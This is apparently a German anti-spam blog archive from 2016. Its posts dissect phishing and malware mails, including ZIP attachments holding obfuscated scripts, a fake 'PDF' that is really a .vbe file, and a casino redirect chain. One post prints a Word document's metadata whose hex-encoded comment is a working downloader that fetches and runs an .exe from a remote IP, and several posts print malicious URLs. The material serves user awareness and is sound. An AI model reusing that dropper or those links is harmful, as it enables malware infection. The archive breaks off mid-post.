Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Schlagwortarchiv „Schadsoftware“

Shipping information

Samstag, 3. September 2016

Dear customer,

Ich bin aber „Liebe 13a9-32-04872 Kundennummer“ und nicht „Lieber Kunde“.

Our shipping service is sending the order form due to the request from your company.

Ich habe auch kein Unternehmen. Und nicht habe nichts angefordert. Und ich werde nichts bestellen.

Please fill the attached form with precise information.

Zielgruppe sind natürlich Mitarbeiter richtiger Unternehmen, die jetzt den Anhang aufmachen sollen, um einen Erpressungstrojaner im Unternehmensnetzwerk zu installieren. Ja, es handelt sich um Schadsoftware. Nein, es ist kein Dokument.

Very truly yours,
Adele Bernard

Du mich auch!

Ich sage es immer wieder, und ich muss es doch noch einmal wiederholen. E-Mail ist ein praktisches, aber auch gefährliches Medium. Es ermöglicht unter anderem Kriminellen, anderen Leuten Dateien zusammen mit einem Vorwand zuzustellen. Jeder Link in einer E-Mail und jede Anhang einer E-Mail ist als gefährlich zu betrachten. Immer. Auch, wenn das Antivirus-Schlangenöl keinen Alarm gibt. Niemals einen E-Mail-Anhang öffnen, der nicht vorher explizit und über einen anderen Kanal als E-Mail vereinbart wurde! Niemals auf eine E-Mail hereinfallen, weil der Absender zu passen scheint, denn der Absender einer E-Mail ist beliebig fälschbar! Immer telefonisch zurückfragen! Und am besten dafür Sorge tragen, dass nur noch digital signierte E-Mail verwendet wird, bei der man den Absender jenseits jedes vernünftigen Zweifels sicherstellen kann. Das kostet nicht einmal Geld. Und es ist nicht schwierig. Ich sage es immer wieder. Ich spreche es in die Flammen, ich spreche es in das Nichts, vor mir rollt eine Welt voll schreiender Dummheit vorbei, die Verbrecher jubeln auf einem Berg von Bitcoin… 🙁

Zum „Glück“ ist es diesmal ein etwas „älterer“ Vertreter, der das erste Mal am 1. September 2016 zu VirusTotal hochgeladen wurde; und deshalb wird die klare Schadsoftware inzwischen schon von der Hälfte der populären Antivirus-Schlangenöle erkannt. Es wäre ja auch echt jetzt mal und wirklich zu viel verlangt, wenn binnen zwei Tage jedes dieser Schlangenöle gegen die aktuell umlaufenden Seuchen funktionieren würde! 🙁

Wie üblich handelt es sich um ein angehängtes ZIP-Archiv…

$ unzip -l 18bbe011a687.zip 
Archive:  18bbe011a687.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    95801  2016-09-03 08:35   D1B2DB19_shipping_service.js
---------                     -------
    95801                     1 file
$ _

…in dem diesmal wieder ein Javascript-Programm für den Windows Script Host liegt. Dies ist eine ausführbare Datei für Microsoft Windows, die bei einem Doppelklick ausgeführt wird. Dieses Programm ist vorsätzlich unverständlich gecodet, um eine Analyse und eine Erkennung durch Antivirus-Software zu erschweren. Es ist klare Schadsoftware. Nach dem dummen Doppelklick steht ein Computer anderer Leute auf dem Schreibtisch. Wenn das in einem Unternehmen passiert, kann sich die Seuche auch im gesamten Unternehmensnetzwerk verbreiten. Weil ein einziger Mensch so naiv war, einen Mailanhang zu „öffnen“ und damit ein Programm von Verbrechern auszuführen.

Und deshalb öffnet man keine Dateien aus einer E-Mail, deren Zustellung nicht vorher über einen anderen Kanal als E-Mail abgesprochen wurde… ach! Ich spreche in die Flammen, ich spreche in das Nichts. 🙁

auftrag nr. 134536339

Montag, 29. August 2016

Vorab: Auf gar keinen Fall den Anhang aufmachen!

Ihre Kundennummer: 4091651

Ah, schön, ich habe eine Nummer.

Auftragsnummer: 134536339

Und das, was ich angeblich beauftragt habe, hat ebenfalls eine fröhliche Ziffernfolge…

Auftragssumme: 13 Eur

…und kostet angeblich Geld. Seltsam, dass ich gar nichts davon weiß.

Liebe Kundin, Lieber Kunde,

Was ich allerdings nicht habe, ist ein Name.

Danke für Ihre Bestellung.

Was mein Auftrag nicht hat, ist ein menschenlesbarer Text neben der schönen, aber für einen Menschen zunächst unverständlichen Ziffernfolge, dem man entnehmen könnte, um was zum hl. Henker es überhaupt geht.

Bitte schauen Sie in den PDF-Anhang für nähere Informationen (klicken Sie doppelt auf das PDF-Dokument).

Um das herauszubekommen, muss ich klick-klick einen Mailanhang öffnen. Damit ich das auch wirklich hinbekomme, sagt mir der Spammer auch noch, wie ich das mache.

Mit freundlichen Grüßen

Ihr Casando-Versand Team
Casando GmbH

Es gibt eine Unternehmung namens Casando, aber die ist nicht für diese gefährliche Spam verantwortlich. Ich möchte dort heute nicht am Telefon sitzen. Dem asozialen Loch von Spammer ist es aber egal, was er anrichtet. Das sieht man ja auch am Anhang…

Hinweis:
Zum Öffnen der PDF-Datei im Anhang benötigen Sie den Acrobat Reader.
Den Gratis-Download des Programms finden Sie unter http://get.adobe.com/de/reader.

…der mitnichten ein PDF-Dokument ist. Es handelt sich um ein ZIP-Archiv, in dem…

$ unzip -l dokument_id1784780765.zip 
Archive:  dokument_id1784780765.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      468  2016-08-24 06:05   dokument_id1784780765.pdf                                             .vbe
---------                     -------
      468                     1 file
$ _

…eine Datei liegt, deren Name auf .vbe endet. Um diese „Kleinigkeit“ vorm Empfänger zu verstecken, enthält der Name vor der richtigen Extension ganz viele Leerzeichen, so dass zusammen mit dem irreführenden Dateinamen der Eindruck entsteht, es handele sich um ein PDF. Die Extension .vbe steht nicht für ein Dokumentformat. Es ist ein ausführbares Programm für Microsoft Windows, das als Anhang einer irreführend formulierten Spam versendet wird und das seinen wirklichen Dateitypen mit einem Trick verbirgt. Das ist klare Schadsoftware. Wer darauf – ganz so, wie der kriminelle Spammer auffordert – doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Viele populäre Antivirus-Programme scheitern zurzeit daran, diese Schadsoftware als solche zu erkennen, was bei derartigen Mails leider der Normalfall ist. Deshalb muss man immer sein Gehirn benutzen. Wer sich auf sein Antivirus-Schlangenöl verlässt, lebt sehr gefährlich.

Und deshalb öffnet man niemals einen Mailanhang, der nicht vorher und über einen anderen Kanal als E-Mail explizit verabredet wurde. Näheres zu diesem Thema habe ich hier schon etwas ausführlicher geschrieben. Ich bitte um Beachtung. Und um Verbreitung, denn es gibt immer noch zu viele Menschen, die auf derartige Spams reinfallen und hinterher bang Banknoten der Europäischen Zentralbank gegen Bitcoin eintauschen, um wieder an ihre Korrespondenz, ihre Fotos, ihre Musik, ihre Dokumente, ihre Filme und ihre Sozialkontakte zu kommen.

Übrigens: Wer regelmäßige Datensicherungen macht, braucht sein Geld nicht derartigen Verbrechern zu geben, wenn er doch mal überrumpelt wurde, sondern spielt einfach eine Datensicherung zurück. 😉

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

  1. Man ist angeblich Kunde, wird aber in einer E-Mail nicht persönlich angesprochen.
  2. Es ist völlig unklar, wer der Absender der E-Mail ist. Es gibt keinerlei Angaben für eine eventuelle Rückfrage.
  3. Es ist eine angebliche Mahnung, aber im Text der Mail fehlen sämtliche Angaben zum Gegenstand der Mahnung. Stattdessen soll in die Mail geklickt werden, um zu erfahren, um was es überhaupt geht.
  4. Der Text der Mail strotzt vor beängstigendem Bullshit, der in dieser Form niemals von einem Kaufmann oder einem Rechtsanwalt geschrieben würde.
  5. „Leben Sie wohl!“ als Abschiedsformel bedarf keiner weiteren Kommentierung

Generell sind Dateien, die ohne vorherige Absprache mit E-Mail zugestellt wurden, mit äußerster Vorsicht zu behandeln. E-Mail ist bei Kriminellen so beliebt, weil es sich um einen Weg handelt, jemanden anders Dateien und ausführbaren Code auf die Festplatte zu spielen – und zwar mit beliebig fälschbarem Absender. Auch bei bekannten Absendern niemals eine derartige Datei öffnen, ohne vorher auf einem anderen Weg als über E-Mail (zum Beispiel telefonisch) kurz Rücksprache gehalten zu haben! Antivirus-Programme nützen gar nichts. Ich wiederhole, weil die Werbung und die Computerjournaille ständig das Gegenteil behauptet: Antivirus-Programme nützen gar nichts. Wenn man sich darauf verlässt, sind sie sogar gefährlich. Das beste Antivirus-Programm ist und bleibt das Gehirn.

Budget Reports

Freitag, 5. August 2016

Hey info

Beste Anrede des Tages!

I attached the annual budget reports that you asked me to send to you.

Ich habe dich um gar nichts gebeten. Und wenn ich mit dir kommunizieren würde und du würdest mir halbwegs regelmäßig Dateien senden, die für mich von Bedeutung sind, dann wäre deine E-Mail digital signiert oder du würdest das nicht tun. Es gibt nämlich Kriminelle da draußen, die Schadsoftware als E-Mail-Anhang versenden.

Best regards,
Brandie Chapman

Du mich auch!

Der Anhang der Spam ist ein ZIP-Archiv namens a131e76a27.zip. Es ist 11 KiB groß und enthält…

$ ls -lh a131e76a27.zip 
-rw-rw-r-- 1 elias elias 11K Aug  5 14:50 a131e76a27.zip
$ unzip -l a131e76a27.zip 
Archive:  a131e76a27.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    77908  2016-08-04 22:08   annual_budget_ c4a8b0d1~.js
---------                     -------
    77908                     1 file
$ _

…exakt eine Datei. Diese ist nicht etwa ein Dokument, sondern ein direkt ausführbares Javascript-Programm für den Windows Script Host. Ein Doppelklick auf diese Datei startet das Programm. Das Programm ist vorsätzlich kryptisch und unverständlich formuliert, um eine Analyse durch Antivirus-Software und durch Menschen zu erschweren. Kein Programmierer würde so programmieren. Es handelt sich um klare Schadsoftware. Nach dem Klick auf das angebliche „Dokument“ steht ein Computer anderer Leute auf dem Tisch.

Obwohl „Locky“, der hier zugestellte Erpressungstrojaner, ein „alter Bekannter“ ist, scheitern zwei Drittel der populären Antivirus-Programme zurzeit daran, diese klare Schadsoftware als Schadsoftware zu erkennen. Wer sich auf den Schutz durch Antivirus-Programme verlassen hat, ist in vielen Fällen wieder einmal verlassen. Natürlich testen auch Kriminelle ihre Machwerke mit den gängigen Antivirus-Programmen und stellen sicher, dass ihre asozialen Nummern ein paar Stunden oder gar Tage lang laufen, denn sie leben davon.

Deshalb ist es so wichtig, niemals einen Mailanhang zu öffnen, wenn dieser nicht vorher explizit über einen anderen Kanal als E-Mail vereinbart wurde. Eine „vertrauenswürdige“ Absenderadresse ist keine Hilfe, denn der Absender einer E-Mail kann beliebig gefälscht werden. Jede E-Mail, die nicht digital signiert ist (und deren digitale Signatur man nicht überprüft hat) ist als E-Mail eines Unbekannten und möglicherweise Kriminellen zu betrachten und zu behandeln. Bei bekannten Absendern immer telefonisch nachfragen, bevor ein Anhang geöffnet wird; Anhänge von Unbekannten niemals öffnen! Und generell gilt: Ein ZIP-, 7z- oder RAR-Archiv als Mailanhang ist eine typische Verpackung für Schadsoftware – wenn sich darin zusätzlich nur eine einzige und relativ kleine Datei befindet, handelt es sich immer um Schadsoftware (oder um die E-Mail eines Vollidioten).

Der beste Schutz vor der Übernahme des eigenen Computers durch Kriminelle ist nicht ein oft wirkungsloses Antivirus-Programm, sondern die Benutzung des Gehirnes. Erfreulicherweise kostet die Hirnnutzung nicht einmal Geld, so dass nichts gegen einen Einsatz spricht. 😉

gammelfleisch@tamagothi.de 500€ Edeka Gutschein für,

Donnerstag, 14. Juli 2016

Zunächst: Edeka hat mit dieser Spam nichts zu tun. Diese Firmierung wird hier nur von jemanden missbraucht, dessen Ansehen bei weitem nicht so gut ist wie das der Marke „Edeka“.

Der Spammer hat es in dieser Spam „versäumt“, die Pfade zu den Grafiken als absolute Pfade anzugeben, so dass die Grafiken nicht geladen werden können, selbst, wenn man seine Mailsoftware dermaßen unsicher konfiguriert, dass das der Standard ist. Warum sollte er sein Skript, bevor er es in hunderttausenden Postfächern Amok laufen lässt, auch mal kurz testen? Er ist ja schließlich ein illegaler und asozialer Spammer, der seine Opfer verachtet.

Hallo nachtwaechter@tamagothi.de,

heute ist Ihr Glückstag. Spielen sie noch heute Bingo und gewinnen Sie einen 500€ EDEKA Gutschein.

Es ist ganz einfach! Sie, wählen Ihre Glückszahl aus und erfahren direkt im Anschluss, ob Sie ein Bingo haben.

[Hier ist ein nicht darstellbares Bild, das verlinkt wurde]

Also warten Sie nicht länger und gehen Sie bald schon kostenfrei einkaufen.

###Impressum###

Zum Abmelden bitte hier klicken

Am besten an dieser Nummer gefällt mir das „Click here“, das gar nicht erst verlinkt wurde; es fügt sich so prächtig in die Impressumsangabe… 😀

Leider steht zu erwarten, dass der Spammer seine peinlichen Fehler in Kürze korrigiert und die gleiche Masche noch einmal fährt. Wenn man auf den Link klickt, gibt es eine geradezu irrsinnige Folge von Javascript-basierten Weiterleitungen, damit auch wirklich sicher ist, dass jedes Opfer dieser Spam Javascript aktiviert hat. Zu guter Letzt landete ich nicht etwa bei „Edeka“, sondern bei einer Umfrage unter Firefox-Benutzern (der User-Agent wird also von den Verbrechern ausgewertet), bei der man anschließend einen Datenstriptease machen kann, um ein iPhone oder einen Amazon-Einkaufsgutschein zu gewinnen.

Benutzer anderer Betriebssysteme (in meinem Fall ist es ein Linux) und anderer Browser werden auf ganz andere Seiten geleitet. Ich bin mir auch ohne die Spur einer weiteren Analyse so gut wie sicher, dass hier anfälligen Betriebssystemen oder Webbrowsern Schadsoftware untergeschoben werden soll.

Wer seinen Browser nicht absichert¹ und/oder veraltete Software verwendet und außerdem in Spams herumklickt, darf sich nicht darüber wundern, wenn er nach einem Klick in eine Spam einen Erpressungstrojaner auf seinem Rechner hat. Statt einen Einkaufsgutschein einzulösen, „darf“ man dann ein paar Tage später bang Banknoten der Europäischen Zentralbank gegen Bitcoin eintauschen und darauf hoffen, dass man auch wirklich wieder an seine Daten, Korrespondenz, Kontakte, E-Mails, Dokumente, Fotos, Videos, Musiksammlung kommt.

Ich rate strikt davon ab, den Erpressern Geld zu geben. Ein solches Signal, dass sich ihr Verbrechen lohnt, ist dumm. Zum Glück geht es auch schlau: Mit einer regelmäßigen Datensicherung beugt man nicht nur Datenverlusten durch technische Defekte und Unfälle vor, sondern trägt auch dazu bei, den kriminellen Sumpf der Erpressung durch Trojaner auszutrocknen, weil die Zahlung eines Lösegeldes nicht erforderlich ist, um wieder an seine Daten zu kommen. Kostenlose Software für diesen Zweck findet sich durch einfachste Benutzung einer Suchmaschine. Selbst technisch unkundige Windows-Nutzer sollten mit einem Programm wie Personal Backup schnell klarkommen – ich empfehle allerdings dringend eine externe Festplatte, die während des normalen Betriebes vom Computer getrennt ist. Wenn ein Erpressungstrojaner nämlich auch auf das Backup zugreifen kann, ist alle Vorsorge umsonst gewesen.

Die Verwendung des Addons NoScript hätte bereits ausgereicht, um schon den ersten Schritt einer Javascript-Weiterleitung fehlschlagen zu lassen. Wenn der Anwender dann nicht so doof ist, dass er Javascript für diese Seite mit einem Klick explizit freischaltet, weil ihm ein Spammer in einer Spam gesagt hat, dass er Bingo spielen und Gutscheine gewinnen kann, ist er vor solchen Angriffen sicher. Es ist keine gute Idee, jedem Menschen in einem anonymisierenden, technischen Medium das Privileg einzuräumen, beliebigen Programmcode im Browser ausführen zu können. Es gibt da draußen nämlich leider ganz viele Gestalten, die vermutlich nur ihre Mutter vermissen würde, wenn es sie nicht gäbe…

Payment

Donnerstag, 23. Juni 2016

Dear gammelfleisch,

Genau mein Name! 😀

Our records show that we have not yet received payment for the previous order #A-797071
Could you please send payment as soon as possible?

Please find attached file for details.

Und einmal das Übliche. Du musst Geld bezahlen. An jemanden, der sich im Absender (in meinem Fall) „Stan Jones“ nennt. Ohne Grund. Wegen der Bestellnummer 08/15. Die zu einer nicht näher bezeichneten Bestellung gehört. Bei einer Unternehmung, die es nicht für erforderlich hält, sich selbst einen Namen zu geben. Mit Kaufleuten, die in ihre Mahnmail nicht reinschreiben, wie groß der Betrag ist. Mach das bitte so schnell wie möglich! Wenn du herausbekommen willst, um was zum hl. Henker es sich hier handelt, wieviel Geld du bezahlen sollst oder was auch immer, dann mach gefälligst den Anhang auf! Auf eine Rückfragemöglichkeit im Text der Mail wurde verzichtet, weil das Mailpapier gerade so knapp ist.

Genau so wird Schadsoftware verpackt. Noch vor jeder eingehenden Prüfung ist klar, dass es sich beim Anhang um das reinste Gift handeln wird. Der Anhang ist ein ZIP-Archiv (mit einerm personalisierten Dateinamen, der in jeder Spam etwas anders lautet, so dass eine Websuche danach fehlschlägt), in dem sich nicht ein wie auch immer geartetes Dokument, sondern eine vorsätzlich kryptisch und unverständlich gecodete Javascript-Datei befindet. Diese wird unter Microsoft Windows übrigens im Windows Scripting Host ausgeführt. Es handelt sich um eine ausführbare Datei für Microsoft Windows, die bei einem Doppelklick ausgeführt wird, alles kann, was jedes gestartete Windows-Programm kann und in einer Spam mit vorsätzlich irreführendem Text zugestellt wurde.

Oder kurz gesagt: Es ist ganz sicher eine Schadsoftware. Wer die Datei im ZIP-Archiv doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Das Antivirus-Programm wird in vielen Fällen nicht helfen, weil es die Schadsoftware nicht erkennt, aber zum Glück hat ein Mensch ein Gehirn, mit dem sich diese Spam sicher als Spam erkennen und löschen lässt. Das ist der beste Virenschutz. Alles weitere habe ich schon so oft geschrieben, dass es mich ermüdet, es hier noch einmal zu wiederholen – ich verweise auf meinen Text vom 5. März dieses Jahres.

Yours sincerely
Stan Jones
Mexico Key Account Director

Diese Spam kommt mit Winkewinke vom Kriminellen, der lieber nicht seinen richtigen Namen unter die Mail schreibt.

Das werden Sie auf jeden Fall genießen

Donnerstag, 16. Juni 2016

Was denn? Kaffee? Nee, das würde mir nicht in einer Spam gesagt, denn in einer Spam wird mir niemals die Wahrheit gesagt.

Hallo!

Das ist schon wieder genau mein Name.

Der Spaß hört bei Jackpot City Casino niemals auf! Zudem erhalten Sie ein 100% Bonus bis zu $/£/€ 400, wenn Sie sich anmelden und Ihre erste Einzahlung tätigen.

Der Spaß im Betrugsstadtcasino hört niemals auf… außer, man ist dort Spieler. Es gibt Bonus, wenn man dort Geld ablegt. In Währungseinheiten. Oder in Credits. Bis zu vierhundert. Ob es sich dabei um US-Dollar, britische Pfund oder Euro handelt, ist völlig egal. So kann man schon vor dem ersten Spiel sehen, dass die auf dem Monitor angezeigte Zahl nichts mit den Banknoten zu tun hat, die man dafür hingelegt hat, dass diese Zahl angezeigt wird und beim Zocken immer kleiner wird.

Spielen Sie Video Slots, Poker, Blackjack, Roulette und viele weitere Spiele. Gewinnen Sie groß bei den tollen regulären Promotionen.

Computergrafik ist ganz was feines. Da kann das Ergebnis einer Datenverarbeitung, die vom Betreiber eines so genannten Casinos für Spieler völlig unentdeckbar manipulierbar ist, wie Spielkarten, Roulettekugeln oder Walzen aussehen. Wer dumm genug ist, lässt sich davon verblenden. Und alle angebotenen Casinospiele wären schon ohne Betrug nachteilhaft für den Spieler. Wer das nicht glaubt, kann sich gern den Palast eines alten Casinos anschauen, etwa in Baden-Baden. Diese ganze Pracht wurde gebaut mit den Verlusten der Spieler. Und sie repräsentiert nur einen kleinen Bruchteil der Verluste der Spieler.

Holen Sie sich Ihren Bonus heute noch! http://djjedi.friko.pl/rwm.htm

Also klicki, klicki zugreifen! Und nicht daran stören, dass die verlinkte Website dafür bekannt ist, schon einmal Schadsoftware verteilt zu haben! Gibt auch Bonus. In auf dem Bildschirm angezeigten Währungseinheiten. :mrgreen:

Ich schreibe hier ja manchmal, wenn ich etwas zu einem Link in einer Spam schreibe, dass auf einen Klick eine „übliche Kaskade von Weiterleitungen“ folgt. Die Spammer setzen beinahe niemals direkte Links, sondern versuchen das eigentliche Linkziel so gut wie möglich zu verschleiern, um Spamfiltern die Arbeit schwerer zu machen. Hier ist die Demonstration mit dem heutigen Link, der übrigens relativ schnell zum Punkt kommt – wer eine Allergie gegen Kommandozeilenakrobatik hat, möge sich einfach abwenden:

$ lynx -dump -mime_header http://djjedi.friko.pl/rwm.htm
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 16 Jun 2016 09:48:58 GMT
Content-Type: text/html
Connection: close
Last-Modified: Wed, 15 Jun 2016 20:16:19 GMT
Accept-Ranges: bytes
X-Powered-By: ModLayout/5.1

<script>document.location.replace("http://bigclubroyal.com/");</script><!-- FOOTER //]]>'"</script></iframe></noembed></embed></object></noscript>-->
<script type="text/javascript" src="/2deb000b57bfac9d72c14d4ed967b572.js?d=ZGpqZWRpLmZyaWtvLnBs"></script>
$ _

Erstmal gibt es eine in Javascript realisierte Weiterleitung zu bigclubroyal (punkt) com. Das zusätzlich ausgelieferte Stück Javascript mit dem sedezimalen Dateinamen existiert zurzeit übrigens nicht und ist dort wohl nur als Denkmal früherer Verwendungen des gleichen Codes verblieben. Ich vermute, dass es sich hier um eine vorübergehend für eine Handvoll Bitcoin eingeschleuste Schadsoftware gehandelt hat, die dann aber später wieder entfernt wurde. Sonst sehen eventuelle Besucher der Website ja diese hässlichen Warnungen, und das wäre doch schlecht fürs eigene kriminelle Geschäft…

Gut, mal schauen, wie es weitergeht:

$ lynx -dump -mime_header http://bigclubroyal.com/
HTTP/1.1 302 Found
Server: nginx/1.8.1
Date: Thu, 16 Jun 2016 09:54:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 6
Connection: close
Set-Cookie: userlike2=%F9%ED9%1D%14%23%21%D6%14%0E%C6%D3.%D5%CFa%D7t%EF%BF%03%A0_G%E5y%DA%D4%CA%F9W%FA%FA%EE%95%DA; expires=Wed, 06-Jul-2016 09:49:21 GMT
Cache-Control: no-store, no-cache,  must-revalidate
Expires: Thu, 16 Jun 2016 12:49:21 +0300
Location: http://bigluckywinners6.com

$ _

Die nächste Weiterleitung gibt es also über HTTP und nicht mehr über Javascript, aber es soll ja auch nicht mehr hinterhältig zusätzliches Javascript mit untergejubelt werden. Es geht zu den sechs großen, glücksbesegneten Gewinnern – vermutlich den Betreibern eines so genannten „Online-Casinos“ mit mafiösem Hintergrund. Oder vielleicht doch eher zu ein paar Affiliate-Lumpenkaufleuten, die ihren Müll ohne Spam nicht loswerden? Mal schauen:

$ lynx -dump -mime_header http://bigluckywinners6.com
HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: https://www.jackpotcitycasino.com/?a=1709515357611636
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDQQQSBSQS=AJJKDGAAFINOGEMDGBBIOKDJ; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2016 10:10:43 GMT
Connection: close

$ _

Ah, jackpotcitycasino (punkt) com ist das nächste Ziel – und diesmal könnte es das letzte sein, denn es wurde eine Affiliate-ID angehängt. Mal schauen (die folgende Pipe auf sed bricht die Ausgabe nach dem Ende der HTTP-Header ab, weil ich sehr viel HTML erwarte):

$ lynx -dump -mime_header https://www.jackpotcitycasino.com/?a=1709515357611636 | sed '/^\s*$/q'
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /deutschland/
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
Set-Cookie: DetectedDevice=IsMobile=False&IsTablet=False&MatchedDeviceID=1&OperatingSystem=&OperatingSystemVersion=&ReportDeviceID=generic; domain=jackpotcitycasino.com; path=/
Set-Cookie: Visit=BannerTag=52de0c70-250f-4425-8af7-7010b153b6ba&BrandCode=JC&CountryIdByIP=276&CurrencyIdByCultureId=200&CurrencyIdByIpId=200&DeviceTypeId=12&Foo=JC&ForwardedIpAddress=2986582089&IpAddress=2986582089&IsDivAVisible=True&IsTrafficInternal=False&MerchantExclusive=False&Variables=P2E9MTcwOTUxNTM1NzYxMTYzNg==; domain=jackpotcitycasino.com; path=/
Set-Cookie: ASP.NET_SessionId=hvghs2zc041djqkfxs0xzrgk; path=/; HttpOnly
Set-Cookie: FCVR=9d1840bd-1d5f-4538-ba07-995383a63909; expires=Sun, 14-Jun-2026 10:14:27 GMT; path=/
Set-Cookie: testValue=~/views/site/index.cshtml=~/views/site/index2016.cshtml; expires=Tue, 16-Jun-2026 10:14:27 GMT; path=/
Set-Cookie: UID=; expires=Tue, 16-Jun-2026 10:14:27 GMT; path=/
Set-Cookie: testName=; expires=Tue, 16-Jun-2026 10:14:27 GMT; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Thu, 16 Jun 2016 10:14:27 GMT
Connection: close
Content-Length: 87006

$ _

In der Tat, das ist das Ziel. Und so sieht das „Casino“ aus:

Screenshot des betrügerischen Casinos

In der Spam gab es zwar noch einen Bonus von bis zu 400 Credits, aber hier gibt es jetzt 1600 Dollar. Dass die auf dem Bildschirm angezeigte Zahl nichts mit richtigem Geld zu tun hat, ist ja schon vorher klar geworden. Wer richtiges Geld gegen eine solche, angezeigte Zahl eintauscht, weil er eine Spam bekommen hat… ach bitte! Zahl dein Lehrgeld lieber an mich als an asoziale und kriminelle Spammer und an „Casinos“, die mit Affiliate-Geldern asoziale und kriminelle Spammer finanzieren, du Naivling! Ich mache da nämlich etwas Anständiges mit, ich kaufe davon Kekse… 😉

RE: ICEPEL – Outstanding Payment- URGENT

Samstag, 11. Juni 2016

Wer? Was? Aber dringend ists! :mrgreen:

Dear ,

Voll mein Name!

I was instructed on behalf of my colleague to contact you, my colleague is currently
on leave,

Wer bist du überhaupt?

We are clearing all our outstanding payments, according to our accounts

department after there end of the month account balance, we found out that we

have some unknown outstanding payment to send to you,

Hat dein Kollege dir auch schon mal gezeigt, wie man eine HTML-E-Mail so formatiert, dass der Leser keinen Augenkrebs davon bekommt?

Aber hey, ein paar völlig Unbekannte, von denen ich noch niemals etwas gehört habe, haben Geld für mich. Das ist doch toll.

kindly confirm the statement as per attachment so we can arrange transfer today

